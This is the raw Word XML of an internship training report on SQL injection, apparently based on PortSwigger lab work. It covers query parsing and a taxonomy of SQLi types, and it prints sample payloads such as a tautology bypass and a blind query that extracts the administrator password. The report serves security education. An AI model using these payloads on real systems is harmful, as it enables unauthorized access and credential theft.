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7F73B1" w:rsidRPr="007F73B1" w:rsidRDefault="007F73B1" w:rsidP="00FE01D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>WEB APPLICATION PENETRATION TESTING: SQL INJECTION</w:t>
      </w:r>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F73B1" w:rsidRPr="007F73B1" w:rsidRDefault="007F73B1" w:rsidP="00FE01D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy &amp; Practical Laboratory Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE01D8" w:rsidRPr="00FE01D8" w:rsidRDefault="00FE01D8" w:rsidP="00FE01D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE01D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prepared by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE01D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A515A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Kaustubh Ashish Bangar</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE01D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F73B1" w:rsidRPr="007F73B1" w:rsidRDefault="007F73B1" w:rsidP="007F73B1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Internship Role:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Application Penetration Testing (WAPT/VAPT) Intern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F73B1" w:rsidRPr="007F73B1" w:rsidRDefault="007F73B1" w:rsidP="007F73B1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Organization:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> IqraSec Academy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F73B1" w:rsidRPr="007F73B1" w:rsidRDefault="007F73B1" w:rsidP="007F73B1">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Submission Category:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F73B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Task 4 — Common Web Vulnerabilities (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE01D8" w:rsidRDefault="007F73B1" w:rsidP="00FE01D8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Platform:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F73B1" w:rsidRDefault="007F73B1" w:rsidP="007F73B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE01D8" w:rsidRDefault="007F73B1" w:rsidP="007F73B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A comprehensive, executive-quality technical report documenting the theoretical frameworks, advanced methodologies, practical exploitations, and defensive remediations surrounding SQL Injection (SQLi) vulnerabilities. Prepared for the IqraSec Academy WAPT Intern</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">ship Phase 1. </w:t>
      </w:r>
      <w:r w:rsidR="00FE01D8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary &amp; Administrative Scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Structured Query Language (SQL) Injection consistently ranks among the most impactful web application security flaws cataloged under OWASP Top 10 (A03:2021 — Injection). At its core, an injection vulnerability represents a fundamental breakdown of the boundary between code execution and untrusted user data. When application layers fail to treat client-supplied parameters as literal data, the relational database management system (RDBMS) interprets the supplied strings as executable SQL commands. The resulting security breach compromises the entire CIA triad: unauthorized data exposure (Confidentiality), unauthorized modification or deletion of records (Integrity), and the potential disruption of database availability through denial-of-service commands or underlying operating system execution (Availability).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This comprehensive technical report provides an exhaustive, multi-layered examination of SQL Injection vulnerabilities evaluated across the PortSwigger Web Security Academy curriculum. Spanning foundational Apprentice labs to advanced Practitioner challenges, this document details the mathematical and syntactic mechanics of SQL manipulation, structural differences between major relational database engines (Oracle, PostgreSQL, Microsoft SQL Server, and MySQL), systematic enumeration protocols, blind time-based inference vectors, and modern perimeter defense bypasses using XML entity encoding.</w:t>
      </w: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Pr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. In-Depth Theoretical Framework &amp; Vulnerability Taxonomy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1 The Execution Lifecycle of a Dynamic SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To understand how SQL injection manifests, consider the classic application architecture where an incoming HTTP request triggers an ad-hoc SQL string construction:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$$\text{Query String} = \text{"SELECT } \text{columns} \text{ FROM } \text{table} \text{ WHERE } \text{param} = \text{'"} + \text{Input} + \text{"' AND status = 1"}$$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When the application concatenates </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Input</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> without tokenization, the lexical analyzer (lexer) and parser of the SQL engine construct an Abstract Syntax Tree (AST) that incorporates the attacker’s input as tokens rather than literals.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If an attacker injects </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>' OR 1=1--</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, the lexer identifies:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A closing single quotation mark delimiter (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), terminating the developer's string literal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>An injected logical operator token (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>An evaluation expression (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), which yields an immutable boolean truth value (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="math-inline"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$\text{true}$</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>An inline comment token (</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), which instructs the SQL parser to discard the subsequent lexemes, effectively neutralizing the trailing </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AND status = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> condition.</w:t>
      </w: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Pr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2 Taxonomy of SQL Injection Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>A. In-Band (Classic) SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In-band SQL injection is characterized by the attacker using the same channel of communication to launch the attack and collect the exfiltrated results.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tautology / WHERE Clause Modification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Altering existing conditional checks to evaluate to true across all stored database rows, forcing the application to dump unreleased or restricted catalog items. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Authentication Subversion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypassing username/password credential checks by neutralizing the password evaluation logic using comment operators. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UNION-Based Extraction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Appending the projected results of an arbitrary </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> query to the primary query results. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Error-Based Extraction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forcing mathematical or database conversion errors (e.g., attempting to cast text data to an integer inside an error handler) so that the database prints confidential schema names within standard HTTP 500 responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>B. Inferential (Blind) SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In many hardened applications, the backend suppresses raw database errors and does not reflect database query results on the screen. The vulnerability must be exploited through inferential channels:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817D5D" w:rsidRPr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Boolean-Based Inference:</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injecting conditional boolean expressions (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a'</w:t>
      </w:r>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). The application's visual layout subtlely changes (e.g., showing or hiding a "Welcome back!" banner), allowing the attacker to reconstruct data bit by bit. </w:t>
      </w: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Pr="00817D5D" w:rsidRDefault="00817D5D" w:rsidP="00817D5D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817D5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
